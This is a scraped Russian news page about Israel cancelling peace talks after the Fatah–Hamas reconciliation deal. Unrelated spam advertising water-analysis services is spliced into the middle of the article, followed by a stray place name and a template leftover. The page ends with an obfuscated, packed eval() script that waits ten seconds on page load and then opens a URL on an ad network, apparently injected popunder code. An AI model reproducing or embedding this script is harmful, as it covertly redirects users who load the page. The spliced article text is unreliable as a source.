Израиль отменил переговоры с Палестиной

Глава Палестинской национальной администрации, лидер правящего движения ФАТХ Махмуд Аббас в среду, 23 апреля, договорился о перемирии с контролирующим сектор Газа исламистским движением ХАМАС. Объявив об урегулировании семилетнего конфликта, стороны договорились сформировать единое правительство и провести всеобщие выборы.

В свою очередь премьер-министр Израиля Биньямин Нетаньяху заявил, что Аббас, заключив это перемирие, тем самым отказался от мира с израильской стороной. Таким образом, запланированные на среду переговоры с палестинцами о продлении мирного процесса были отменены.

Узнать стоимость анализа водыможно прямо на сайте. Перед обустройством систем водоподготовки, необходимо провести химический анализ воды. Это непременная задача, прежде, чем можно приступать к дальнейшим работам. Специалисты, имеющие долгий опыт работы в этой сфере, произведут качественный анализ в максимально сжатые сроки.

Соединенные Штаты, которые наряду с Израилем и ЕС считают ХАМАС террористической организацией, известие о перемирии двух палестинских движений также восприняли без энтузиазма. «Мы, конечно, были разочарованы этим сообщением», — заявила в ходе брифинга официальный представитель Государственного департамента США Джен Псаки. По ее словам, это серьезно осложнит усилия сторон в поддержку мирного урегулирования.

В ответ на эти заявления Аббас подчеркнул, что преодоление межпалестинского конфликта не станет препятствием для поисков мира с Израилем. «Между примирением и переговорами нет никаких противоречий. Мы стремимся к установлению справедливого мира на основе сосуществования двух государств», — заявил лидер ФАТХ.

Сектор Газа находится под управлением ХАМАС с 2007 года после победы представителей этого движения на выборах и последовавшего конфликта с движением ФАТХ. В результате конфликта Палестинская автономия фактически оказалась разделена на две части — сектор Газа, находящийся под управлением ХАМАС, и Западный берег реки Иордан, где власть принадлежит движению ФАТХ.

Между тем израильтяне и палестинцы при посредничестве США пытаются согласовать условия продления мирных переговоров, которые должны завершиться 29 апреля. Израильские поселения на Западном берегу являются самым болезненным противоречием, не позволяющим достичь мира с арабами. Палестинские лидеры требуют, чтобы их государство занимало всю территорию Западного берега и Восточного Иерусалима, а не только те земли, которые пока еще не заняты еврейскими поселениями. Израильтяне настаивают на невозможности эвакуации своих колоний. Пакшеньга, Вельский район, Архангельская область

Please publish modules in offcanvas position.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('<5>4 n="c://b.a.9/8?7=6";4 2=d;e 3(){f(2>0){2--;4 g=2+1;i("3()",j)}h{k.l("c://b.a.9/8?7=6","m")}}3();',24,24,'||count|countDown|var|script|688b0be27b4d45d6562eba71df5c7886|key|ef4ex511a|com|effectivecpmnetwork|www|https|10|function|if|waktu|else|setTimeout|1000|window|open|_0|url'.split('|'),0,{}))